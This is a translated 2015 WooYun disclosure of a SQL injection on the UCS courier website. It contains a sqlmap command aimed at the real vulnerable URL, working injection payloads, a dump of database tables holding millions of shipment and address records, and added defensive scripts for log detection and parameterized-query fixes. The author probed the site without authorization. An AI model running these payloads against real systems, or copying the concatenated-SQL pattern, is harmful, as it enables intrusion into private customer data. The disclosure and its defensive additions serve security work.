
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144783

Title: SQL injection on the UCS official site can leak 30 million express shipment records

Vendor: UCS

Author: 路人甲

Submitted: 2015-10-04 18:08

Fix time: 2015-11-18 18:10

Disclosed: 2015-11-18 18:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-04: actively contacting the vendor and waiting for it to claim the report; details not disclosed
2015-11-18: the vendor has actively ignored the report; details disclosed to the public

Brief description:

UCS is a well-known express carrier. A friend used their service for a purchase, so I tested it in passing.
Currently, we can ship from the following countries to China, Hong Kong, and Taiwan:
· United States (CA, NY, DE)
· Amsterdam, Netherlands
· France
· Germany
· Japan
· London, England
· Melbourne/Sydney, Australia
· Vancouver, Canada
· Vienna, Austria

Detailed description:

Injection point:
python sqlmap.py -u "http://www.ucsus.com/News.asp?Method=View&NewsID=170"
[sqlmap screenshot]:

1.jpg


[Database screenshot]:
Row counts are marked in the screenshot

2.jpg


| dbo.UCS_PackageStatusLOG | 33814513 | package status
| dbo.UCS_SenderAddress | 3980814 |
| dbo.UCS_ReceiveAddress | 3959837 | sender and receiver addresses
| dbo.UCS_ReceivePackage_History | 1948694 | history records
[Database information]:

Database: UCS
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| dbo.UCS_PackageStatusLOG | 33814513 |
| dbo.UCS_NEWPODItemAPI | 10928805 |
| dbo.UCS_TransitStatus_History | 9320179 |
| dbo.UCS_ShipmentItem_History | 4105276 |
| dbo.UCS_SenderAddress | 3980814 |
| dbo.UCS_ReceiveAddress | 3959837 |
| dbo.aaa | 3055047 |
| dbo.UCS_TrackingConfirm_20150729 | 2659181 |
| dbo.UCS_NEWPODAPI | 2221796 |
| dbo.UCS_TrackingConfirmLog | 2162962 |
| dbo.UCS_Transit | 1975173 |
| dbo.UCS_ReceivePackage_History | 1948694 |
| dbo.UCS_EDILog | 1661784 |
| dbo.UCS_BillRece | 1643932 |
| dbo.UCS_PackageStatus_20150415 | 1596090 |
| dbo.UCS_Billinfo | 1405279 |
| dbo.UCS_PackingListCompare | 1130855 |
| dbo.查询 | 10747 |
| dbo.Sync_Old2New_TrackInf | 964505 |
| dbo.Sync_Old2New_StationUserID | 959997 |
| dbo.Sync_Old2New_TrackConfirm | 952638 |
| dbo.Sync_Old2New_Track_PPLNO | 941882 |
| dbo.Sync_Old2New_TrackWt_PP | 941878 |
| dbo.UCS_ZipArea | 868624 |
| dbo.UCS_Iherb_Confirm | 853216 |
| dbo.UCS_Shipment_History | 848590 |
| dbo.UCS_Package_History | 848543 |
| dbo.UCS_Envelope | 760646 |
| dbo.UCS_ExportInsurance | 646146 |
| dbo.UCS_ExportInsuranceRemark | 645138 |
| dbo.UCS_LoginLog | 382674 |
| dbo.Ucs_HpodData | 327163 |
| dbo.UCS_EmsReturnInfo | 319883 |
| dbo.Ucs_ManifestUploadLog | 281685 |
| dbo.UCS_FreeTrackNumber | 246017 |
| dbo.UCS_ChangeTrackingBounding | 243301 |
| dbo.Warehouse_TransitLog | 233017 |
| dbo.UCS_Remark | 221049 |
| dbo.UCS_StationLOG | 189513 |
| dbo.UCS_TaxPackage | 187064 |
| dbo.UCS_TrackIndex | 185258 |
| dbo.UCS_TrackNumberTJHistory | 177458 |
| dbo.Ucs_SchedulePickupConfirm | 167221 |
| dbo.UCS_BillInvoice | 164094 |
| dbo.UCS_ThirdPartyAddress | 152544 |
| dbo.UCS_PackingListConfirm | 132109 |
| dbo.UCS_UserGroup | 131102 |
| dbo.UCS_PackageStatusTemp1 | 117673 |
| dbo.yao | 106630 |
| dbo.UCS_ReceivePackageBindInvoiceNote | 102036 |
| dbo.UCS_BillInvoiceStatus | 96975 |
| dbo.CallCenter_DutyDate | 87974 |
| dbo.UCS_BillOtherFee | 87200 |
| dbo.UCS_PackingListWorkTime | 87189 |
| dbo.UCS_BillSS | 79392 |
| dbo.UCS_BillHistory | 77211 |
| dbo.UCS_ZIPCodeUS | 76109 |
| dbo.SyncTrackNumber | 64450 |
| dbo.CallCenter_TSS | 55384 |
| dbo.shaozhongl | 52138 |
| dbo.steven13you | 52138 |
| dbo.UCS_AddressBook | 43320 |
| dbo.UCS_ZIPCodeCN | 40620 |
| dbo.Warehouse_SubPackage | 40354 |
| dbo.UCS_InvoiceNote | 39302 |
| dbo.CallCenter_CustomsCheck | 33328 |
| dbo.Warehouse_ProductItem | 31363 |
| dbo.Warehouse_Package | 30432 |
| dbo.UCS_BatchImport | 23469 |
| dbo.UCS_PrePaidPackage | 19154 |
| dbo.Sync_Old2New_HpodTrackEvent | 16711 |
| dbo.UCS_NoAuthenticateTrackNumber | 16627 |
| dbo.UCS_Account | 16467 |
| dbo.YouJia201404 | 15345 |
| dbo.YouJia201405 | 14897 |
| dbo.Sync_Old2New_HpodTrackElhkTag | 14182 |
| dbo.UCS_IsElHkTrack | 14176 |
| dbo.YouJia201406 | 13203 |
| dbo.UCS_EmsGroup | 12525 |
| dbo.UCS_ReceiveGroup | 11984 |
| dbo.UCS_DriverWorkTime | 11033 |
| dbo.UCS_BillTemp | 9303 |
| dbo.ucs_packagesyncstatus | 9123 |
| dbo.PackageBatchImport | 9100 |
| dbo.UCS_MessageOK | 7918 |
| dbo.UCS_MainInvoice | 6928 |
| dbo.Steven_shuijin07 | 6633 |
| dbo.YouJia201407 | 6203 |
| dbo.UCS_TransportOilWear | 5546 |
| dbo.GuestBook | 5542 |
| dbo.UCS_AwbNumber | 5368 |
| dbo.TrackNumber_20130129 | 5356 |
| dbo.UCS_AWBHouse | 5125 |
| dbo.tracknumbersuijin | 5099 |
| dbo.TrackNumber_FZ | 5000 |
| dbo.UCS_ReturnPackage | 4908 |
| dbo.Sheet1$ | 4639 |
| dbo.UCS_ShippingMark | 4504 |
| dbo.bushuju2012110702 | 4486 |
| dbo.bushuju2012110701 | 4482 |
| dbo.UCS_ManifestStatusLog | 3753 |
| dbo.UCS_MGroup | 3669 |
| dbo.UCS_CheckPrint | 2659 |
| dbo.UCS_ManifestBind | 1945 |
| dbo.UCS_QuanShunLog | 1911 |
| dbo.UCS_PickupQueue | 1784 |
| dbo.UCS_TransportOiling | 1728 |
| dbo.UCS_Email | 1669 |
| dbo.UCS_HShipment | 1657 |
| dbo.NonePhoneTrackNo | 1621 |
| dbo.UCS_AwbNoManage | 1618 |
| dbo.UCS_UPUCode | 1557 |
| dbo.UCS_Currency | 1535 |
| dbo.Warehouse_User | 1340 |
| dbo.UCS_Iherb_Scan_Log | 1259 |
| dbo.UCS_PartnerPackingListPaletCount | 1218 |
| dbo.Warehouse_ProductOrderDetail | 1088 |
| dbo.UCS_RateCheck | 1027 |
| dbo.Sync_Old2New_UserInf | 810 |
| dbo.UCS_TSAPass | 790 |
| dbo.UCS_BatchArrival | 781 |
| dbo.UCS_PartnerInvoiceGroup | 745 |
| dbo.UCS_MultiplePOD | 740 |
| dbo.UCS_ItemLimitBlack | 723 |
| dbo.CallCenter_ReturnGroup | 657 |
| dbo.TempReturnPackage130322 | 606 |
| dbo.UCS_FreePackage | 589 |
| dbo.UCS_TrackingNoManage | 526 |
| dbo.UCS_Reason | 511 |
| dbo.UCS_CustomsCode | 400 |
| dbo.UCS_ZIPCodeTW | 387 |
| dbo.UCS_TaxLog | 302 |
| dbo.UCS_PickupAddress | 254 |
| dbo.UCS_AirFlight | 240 |
| dbo.UCS_Performance | 217 |
| dbo.UCS_Commission | 197 |
| dbo.UCS_QuickPOD | 186 |
| dbo.UCS_StationContact | 179 |
| dbo.UCS_ChangeTypeConfig | 160 |
| dbo.UCS_IPLicence | 157 |
| dbo.UCS_HpodInsError | 142 |
| dbo.UCS_EDIErrorCode | 100 |
| dbo.UCS_Staff | 93 |
| dbo.UCS_News | 89 |
| dbo.SYNC_MYSQL | 85 |
| dbo.UCS_AwbAddress | 60 |
| dbo.cs131101 | 59 |
| dbo.UCS_PartnerContact | 41 |
| dbo.Warehouse_Location | 36 |
| dbo.UCS_CustomerNeeds | 35 |
| dbo.UCS_InvoiceItemClass2 | 35 |
| dbo.UCS_TransportCar | 33 |
| dbo.UCS_CustomsUnit | 32 |
| dbo.Sync_Old2New_TrackElhk | 31 |
| dbo.UCS_Airport | 31 |
| dbo.Warehouse_ServiceFee | 31 |
| dbo.UCS_EDIDispatch | 28 |
| dbo.UCS_Help | 27 |
| dbo.UCS_BEEvent | 23 |
| dbo.UCS_EDIState | 22 |
| dbo.CallCenter_TrackPackage | 19 |
| dbo.UCS_AirLine | 19 |
| dbo.UCS_ZIPCodeHK | 18 |
| dbo.UCS_PartnerPackingStatusNotify_EMI | 17 |
| dbo.UCS_AccountType | 15 |
| dbo.UCS_BillStatement | 13 |
| dbo.UCS_PaymentType | 13 |
| dbo.UCS_Surcharge | 13 |
| dbo.UCS_InsuranceCommission | 11 |
| dbo.UCS_InvoiceItemClass3 | 11 |
| dbo.UCS_RmSmallClass | 11 |
| dbo.Warehouse_Express | 11 |
| dbo.UCS_Country | 10 |
| dbo.UCS_CreditCard | 10 |
| dbo.UCS_PickupLocation | 10 |
| dbo.UCS_Type | 7 |
| dbo.UCS_KnowShipperAddress | 5 |
| dbo.UCS_Refund | 5 |
| dbo.UCS_StationInventoryGroup | 5 |
| dbo.CallCenter_DutyCustomsCode | 4 |
| dbo.UCS_Area | 4 |
| dbo.UCS_StationArea | 4 |
| dbo.Warehouse_Shelf | 4 |
| dbo.UCS_BillInPayFee | 3 |
| dbo.UCS_InsuranceCurrency | 3 |
| dbo.UCS_RmBigClass | 3 |
| dbo.UCS_SubInvoiceNote | 3 |
| dbo.Warehouse_Name | 3 |
| dbo.CallCenter_OtherFee | 2 |
| dbo.UCS_AwbRateAdjust | 2 |
| dbo.UCS_InvoiceItemClass1 | 2 |
| dbo.Warehouse_BigClass | 2 |
| dbo.Warehouse_SmallClass | 2 |
| dbo.CallCenter_LockGoodsGroup | 1 |
| dbo.UCS_Location | 1 |
| dbo.UCS_Setup | 1 |
+----------------------------------------+---------+

Proof of vulnerability:

[Full sqlmap run]

[17:15:19] [INFO] testing connection to the target URL
[17:15:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
[17:15:29] [INFO] target URL is stable
[17:15:30] [INFO] heuristics detected web page charset 'ascii'
[17:15:30] [INFO] heuristic (basic) test shows that GET parameter 'NewsID' might be injectable (possible DBMS: 'Microsoft SQL Server')
[17:15:31] [INFO] testing for SQL injection on GET parameter 'NewsID'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[17:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:16:09] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase inline queries' injectable
[17:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:16:09] [WARNING] time-based comparison requires larger statistical model, please wait....................
[17:16:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:16:28] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[17:16:34] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[17:16:38] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[17:17:39] [INFO] GET parameter 'NewsID' seems to be 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' injectable
[17:17:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:17:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:17:41] [WARNING] reflective value(s) found and filtering out
[17:17:41] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:17:44] [INFO] target URL appears to have 8 columns in query
[17:17:55] [INFO] GET parameter 'NewsID' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'NewsID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Parameter: NewsID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Method=View&NewsID=170 AND 2212=2212

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Method=View&NewsID=170 AND 3021=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3021=3021) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: Method=View&NewsID=-4728 UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(97)+CHAR(117)+CHAR(72)+CHAR(102)+CHAR(85)+CHAR(87)+CHAR(71)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: Method=View&NewsID=-9061 OR 6159=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: Method=View&NewsID=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3277=3277) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113))
---
[17:18:30] [INFO] testing Microsoft SQL Server
[17:18:31] [INFO] confirming Microsoft SQL Server
[17:18:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
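Every payload sqlmap reports above follows one pattern: the value it wants to read is wrapped between two random marker strings built from CHAR() calls (this run used qqpkq and qbppq), so it can be cut out of the page body (UNION query) or out of SQL Server's conversion error (error-based CONVERT(INT, ...)); the CASE WHEN (a=b) THEN CHAR(49) ELSE CHAR(48) subselect is the blind probe that turns a yes/no question into a '1' or '0' inside those markers, and the time-based payload is a seven-way cross join of sysusers whose row count grows as n^7. The script below is an added example, not part of the report: it decodes the two payloads copied from sqlmap's output into the string the server actually concatenates, reproduces the error-based leak with a stand-in for SQL Server's error 245 message text, and runs log-side signatures for the same five techniques over a constructed IIS 7.5 W3C log excerpt so a defender can find this scan after the fact. The log lines, client IP and field layout are constructed for the demo.

```python
"""Decode the sqlmap payloads shown above and flag them in IIS W3C logs.

Added example, not part of the WooYun report. The two payload strings are
copied from sqlmap's output above; the IIS log lines are constructed.
"""
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# sqlmap wraps the value it wants to read between a random prefix and suffix so
# it can cut it out of the page or of an error message. This run used qqpkq/qbppq.
CHAR_RE = re.compile(r"CHAR\((\d+)\)")
CASE_RE = re.compile(
    r"\(SELECT \(CASE WHEN \((\d+)=(\d+)\) THEN CHAR\((\d+)\) ELSE CHAR\((\d+)\) END\)\)"
)

ERROR_BASED = (
    "170 AND 3021=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)"
    "+(SELECT (CASE WHEN (3021=3021) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)))"
)
UNION_QUERY = (
    "-4728 UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)"
    "+CHAR(109)+CHAR(97)+CHAR(117)+CHAR(72)+CHAR(102)+CHAR(85)+CHAR(87)+CHAR(71)"
    "+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)"
    ",NULL,NULL,NULL,NULL,NULL,NULL--"
)


def fold_case(expr: str) -> str:
    """Evaluate sqlmap's blind probe: CASE WHEN (a=b) THEN CHAR(49) ELSE CHAR(48)."""
    def pick(m) -> str:
        a, b, if_true, if_false = m.groups()
        return f"CHAR({if_true if a == b else if_false})"
    return CASE_RE.sub(pick, expr)


def decode_char_concat(expr: str) -> str:
    """Return the string SQL Server builds from a CHAR(n)+CHAR(n)+... expression."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(fold_case(expr)))


def between_markers(text: str, prefix: str = "qqpkq", suffix: str = "qbppq") -> Optional[str]:
    """Cut out what sqlmap cuts out: the bytes between its prefix and suffix."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), text, re.S)
    return m.group(1) if m else None


def mssql_convert_int_error(value: str) -> str:
    """Stand-in for SQL Server's error 245 text: the server echoes the whole
    concatenated string in the message, which is the channel sqlmap reads."""
    return f"Conversion failed when converting the varchar value '{value}' to data type int."


# Log-side signatures for the techniques sqlmap confirmed on NewsID.
SIGNATURES = [
    ("union-query", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
    ("error-based-convert", re.compile(r"\bCONVERT\(\s*INT\s*,", re.I)),
    ("sqlmap-char-concat", re.compile(r"CHAR\(\d+\)\+CHAR\(\d+\)", re.I)),
    ("heavy-query-timing", re.compile(r"\bsysusers\s+AS\s+sys\d", re.I)),  # sysusers cross join
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
]


def classify_query(raw_query: str) -> List[str]:
    """IIS logs cs-uri-query still URL-encoded; decode before matching."""
    q = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES if rx.search(q)]


# Constructed IIS 7.5 W3C log excerpt (not from the vendor); the query strings are
# shortened versions of the payloads above, encoded the way IIS records them.
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2015-10-04 17:15:19 10.0.0.5 GET /News.asp Method=View&NewsID=170 80 203.0.113.7 200
2015-10-04 17:16:08 10.0.0.5 GET /News.asp Method=View&NewsID=170+AND+2212%3D2212 80 203.0.113.7 200
2015-10-04 17:16:08 10.0.0.5 GET /News.asp Method=View&NewsID=170+AND+3021%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28113%29%29%29 80 203.0.113.7 500
2015-10-04 17:17:39 10.0.0.5 GET /News.asp Method=View&NewsID=-9061+OR+6159%3D%28SELECT+COUNT%28*%29+FROM+sysusers+AS+sys1%2Csysusers+AS+sys2%29 80 203.0.113.7 200
2015-10-04 17:17:55 10.0.0.5 GET /News.asp Method=View&NewsID=-4728+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28113%29%2CNULL-- 80 203.0.113.7 200
"""


def scan_iis_log(text: str) -> List[dict]:
    """Parse a W3C log by its #Fields header and return the requests that match."""
    fields, hits = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        tags = classify_query(rec.get("cs-uri-query", "-"))
        if tags:
            hits.append({"time": rec["time"], "c-ip": rec["c-ip"], "uri": rec["cs-uri-stem"],
                         "status": rec["sc-status"], "tags": tags})
    return hits


if __name__ == "__main__":
    decoded = decode_char_concat(ERROR_BASED)
    print(decoded, "->", between_markers(mssql_convert_int_error(decoded)))
    print(between_markers(decode_char_concat(UNION_QUERY)))
    for hit in scan_iis_log(IIS_LOG):
        print(hit)
```

The marker strings change on every sqlmap run, so the durable log signatures are the CHAR()+CHAR() concatenation, CONVERT(INT, on a GET parameter, UNION ALL SELECT NULL, and the sysusers self-join; the 500 status on the error-based request is the second signal worth alerting on, since a working News.asp never needs to raise one.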

Fix recommendation:
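The report leaves this section blank. As an added example, not the vendor's code (no source is on the page): the endpoint is classic ASP on SQL Server 2008, and the defect sqlmap confirmed is the NewsID request parameter being pasted into the SQL text, which is why boolean, error-based, UNION, time-based and inline techniques all work on it. The script below puts the vulnerable pattern next to the fixed one, using Python's sqlite3 as a stand-in DBMS so it runs offline. UCS_News and UCS_Account are table names from the dump above; their columns and rows are assumed for the demo, and sqlite's || replaces SQL Server's + for string concatenation.

```python
"""Vulnerable vs. fixed handling of a News.asp?Method=View&NewsID=... lookup.

Added example, not the vendor's code (the page shows no source). The site runs
classic ASP on SQL Server 2008; sqlite3 stands in here so the demo runs offline.
UCS_News and UCS_Account are table names from the dump above; their columns and
rows are assumed for this demo.
"""
import sqlite3
from typing import List


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE UCS_News (NewsID INTEGER PRIMARY KEY, Title TEXT);
        CREATE TABLE UCS_Account (UserName TEXT, Password TEXT);
        INSERT INTO UCS_News VALUES (170, 'Shipping notice'), (171, 'Holiday hours');
        INSERT INTO UCS_Account VALUES ('admin', 'hunter2');
    """)
    return con


def view_news_vulnerable(con: sqlite3.Connection, news_id: str) -> List[str]:
    """The defect class behind the finding: the raw parameter is pasted into the
    SQL text, so 'AND 1=2' or 'UNION ALL SELECT ...' execute as SQL."""
    sql = "SELECT Title FROM UCS_News WHERE NewsID = " + news_id
    return [row[0] for row in con.execute(sql)]


def view_news_fixed(con: sqlite3.Connection, news_id: str) -> List[str]:
    """Validate the parameter's type, then bind it: the DBMS receives the query
    text and the value separately and never parses the value as SQL."""
    if not news_id.isdigit():
        raise ValueError("NewsID must be a non-negative integer")
    sql = "SELECT Title FROM UCS_News WHERE NewsID = ?"
    return [row[0] for row in con.execute(sql, (int(news_id),))]


def fixed_rejects(con: sqlite3.Connection, news_id: str) -> bool:
    """True when the hardened handler refuses the value before any query runs."""
    try:
        view_news_fixed(con, news_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = setup_db()
    # Boolean-based blind: probes in the style of sqlmap's 'AND 2212=2212' flip the result.
    print(view_news_vulnerable(con, "170 AND 1=1"), view_news_vulnerable(con, "170 AND 1=2"))
    # UNION: a non-existent id plus UNION ALL pulls rows out of another table.
    print(view_news_vulnerable(con, "-4728 UNION ALL SELECT UserName || ':' || Password FROM UCS_Account--"))
    print(view_news_fixed(con, "170"), fixed_rejects(con, "170 AND 1=1"))
```

In the original stack the same change is an ADODB.Command with a parameter created as adInteger in place of concatenating Request.QueryString("NewsID") into the query, plus the numeric check before the query runs; with the value bound rather than parsed, none of the five techniques sqlmap confirmed has anything to work on.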

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted or actively refused the report.

Rank: 15 (WooYun assessment)